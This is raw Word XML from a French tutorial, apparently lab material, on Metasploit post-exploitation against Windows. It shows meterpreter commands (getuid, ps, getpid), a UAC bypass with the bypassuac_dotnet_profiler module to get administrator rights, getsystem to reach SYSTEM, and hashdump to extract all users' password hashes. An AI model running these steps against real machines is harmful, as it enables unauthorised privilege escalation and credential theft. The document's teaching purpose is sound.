    <w:p w14:paraId="59413DB4" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E52747" w14:textId="207E7A4C" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Voir avec quel utilisateur nous somme connecté</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0693AF" w14:textId="5F5923A8" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68B2B2FF" w14:textId="72C71852" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFCF819" wp14:editId="35C6D018">
            <wp:extent cx="2773680" cy="525780"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="92" name="Picture 9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Graphical user interface, application&#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73680" cy="525780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD1FC50" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF240CE" w14:textId="28B70BD5" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Voir la liste des processus en cours sur la machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC372D" w14:textId="1C46039D" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55EAD5AD" w14:textId="6A6B3EEF" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F5A39A8" wp14:editId="60AB39F6">
            <wp:extent cx="5090160" cy="2052900"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="94" name="Picture 9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Graphical user interface, website&#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98084" cy="2056096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E94727" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ADC38C1" w14:textId="240BAC42" w:rsidR="005476B6" w:rsidRDefault="006619D7" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Voir l’identifiant de processus dans lequel notre metrerpreter s’exécute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B847A91" w14:textId="7730A92B" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C403E5" w14:textId="6039FBF9" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3350EA69" wp14:editId="5E5F6EA3">
            <wp:extent cx="2255520" cy="3429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55520" cy="342900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DFB6A" w14:textId="77777777" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA58249" w14:textId="15A7DF8B" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Et donc en vérifiant avec la liste des processus, nous pouvons voir le nom du </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>processus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exécute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> notre </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t>, dans notre cas « </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe</w:t>
      </w:r>
      <w:r>
        <w:t> »</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD8B2BE" w14:textId="3581DF21" w:rsidR="005476B6" w:rsidRDefault="005476B6" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BA0F1B" wp14:editId="2E41130F">
            <wp:extent cx="5759450" cy="189865"/>
            <wp:effectExtent l="0" t="0" r="0"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9450" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D2864" w14:textId="77777777" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710C56F1" w14:textId="77777777" w:rsidR="006619D7" w:rsidRDefault="006619D7" w:rsidP="005476B6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30821042" w14:textId="2DC8DB24" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc133586246"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Elévation de privilège</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="49A6F7E5" w14:textId="777FC8B3" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Maintenant pour nous le but est d’élevé nos privilèges afin de récupérer un compte administrateur et au mieux le compte </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTORITY/System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> qui est le compte qui possède le plus de droit sur </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD6706" w14:textId="6708382D" w:rsidR="002F07BD" w:rsidRPr="006619D7" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour cela on va d’abord mettre notre session en </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> via </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ctrl + z</w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3583F5E8" w14:textId="7D042D29" w:rsidR="002F07BD" w:rsidRPr="006619D7" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="006619D7">
        <w:t>Ensuit</w:t>
      </w:r>
      <w:r w:rsidR="006619D7" w:rsidRPr="006619D7">
        <w:t>e nous allons lancer u</w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>ne recherche</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33822E25" w14:textId="75390746" w:rsidR="002F07BD" w:rsidRPr="00A0138A" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0138A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD" w:rsidRPr="00A0138A">
        <w:t>earch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F07BD" w:rsidRPr="00A0138A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F07BD" w:rsidRPr="00A0138A">
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F07BD" w:rsidRPr="00A0138A">
        <w:t>/local/by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B4C2F" w14:textId="77777777" w:rsidR="006619D7" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484B879D" w14:textId="4ED14467" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidRPr="002F07BD">
        <w:t>La liste en résultat n</w:t>
      </w:r>
      <w:r>
        <w:t>ous donne des exploitation</w:t>
      </w:r>
      <w:r w:rsidR="001053FF">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> possible</w:t>
      </w:r>
      <w:r w:rsidR="001053FF">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F03BE" w14:textId="023A813B" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63E9D9E7" wp14:editId="6801FB11">
            <wp:extent cx="5759450" cy="1608455"/>
            <wp:effectExtent l="0" t="0" r="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9450" cy="1608455"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80DE6A" w14:textId="77777777" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5AFEA3" w14:textId="194D37A3" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour cet exemple, nous allons utiliser l’exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>bypassuac_dotnet_profiler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB0D1C" w14:textId="117F082A" w:rsidR="002F07BD" w:rsidRPr="006619D7" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A noté qu’il est possible que cet exploit ne fonctionne pas de votre côté, il faut s’adapter à la machine que l’on attaque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC42580" w14:textId="2B73A853" w:rsidR="002F07BD" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Nous</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t xml:space="preserve"> tap</w:t>
      </w:r>
      <w:r>
        <w:t>ons</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t xml:space="preserve"> la commande </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AE814B" w14:textId="2564142C" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>Use 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F080C3E" w14:textId="751EDBEF" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593F665" w14:textId="7472E141" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="650ABD79" wp14:editId="282C51E7">
            <wp:extent cx="5759450" cy="2897505"/>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9450" cy="2897505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DA0928" w14:textId="37037699" w:rsidR="002F07BD" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t>Nous</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>remplissons</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t xml:space="preserve"> les champs en fonction de notre situation, il faut également modifier le champs </w:t>
      </w:r>
      <w:r w:rsidR="002F07BD" w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t xml:space="preserve"> pour donner un port qui n’est pas encore utilisé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F8E75" w14:textId="77777777" w:rsidR="006619D7" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AED699" w14:textId="62B1D544" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Une fois fait, on lance la commande</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84CE87" w14:textId="25450C68" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A832666" w14:textId="4F6A14E4" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02C7465E" wp14:editId="2811B82F">
            <wp:extent cx="5013409" cy="128016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34945" cy="1285659"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F1601" w14:textId="77777777" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32A1277F" w14:textId="4AEB03EA" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Une fois l’exploit complété, une nouvelle session </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> c’est lancée avec le compte de l’utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DB5508" w14:textId="678B35F2" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mais </w:t>
      </w:r>
      <w:r w:rsidR="00E2491A">
        <w:t xml:space="preserve">à </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">la différence que le compte est en mode </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> car il possède </w:t>
      </w:r>
      <w:r w:rsidR="00F0133F">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>es droit</w:t>
      </w:r>
      <w:r w:rsidR="00F0133F">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur la machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56CC4A" w14:textId="28956549" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Donc </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>nous</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>ouvons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lancer la commande</w:t>
      </w:r>
      <w:r w:rsidR="00FE3A7A">
        <w:t xml:space="preserve"> suivante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>pour récupérer le compte system</w:t>
      </w:r>
      <w:r w:rsidR="00FE3A7A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5A863" w14:textId="7E1581CB" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A9DD067" w14:textId="1159EA74" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B99610B" wp14:editId="0FCE08B2">
            <wp:extent cx="5585728" cy="2674620"/>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9444" cy="2690764"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65773A7C" w14:textId="77777777" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F093D26" w14:textId="6701AB08" w:rsidR="002F07BD" w:rsidRPr="006619D7" w:rsidRDefault="006619D7" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous voyons que l’on a basculé sur le compte </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NT AUTORITY/System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236AE378" w14:textId="6B083888" w:rsidR="002F07BD" w:rsidRDefault="006619D7" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="002F07BD">
        <w:t>etuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26657AA3" w14:textId="2EDADA50" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="524F8858" wp14:editId="2143532E">
            <wp:extent cx="3322320" cy="365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22320" cy="365760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D08CC51" w14:textId="77777777" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784E01E6" w14:textId="5E194B11" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A ce niveau, </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>nous avons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un accès total à la machine, pour tester </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t>nous pouvons récupérer le hash des mots de passe de tous les utilisateurs de la machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236FFE2" w14:textId="5BD60877" w:rsidR="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1528EDE6" w14:textId="42BD14BE" w:rsidR="002F07BD" w:rsidRPr="002F07BD" w:rsidRDefault="002F07BD" w:rsidP="002F07BD">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47C38792" wp14:editId="0F0C77FE">
            <wp:extent cx="5759450" cy="791210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="7" name="Picture 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medium confidenc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9450" cy="791210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
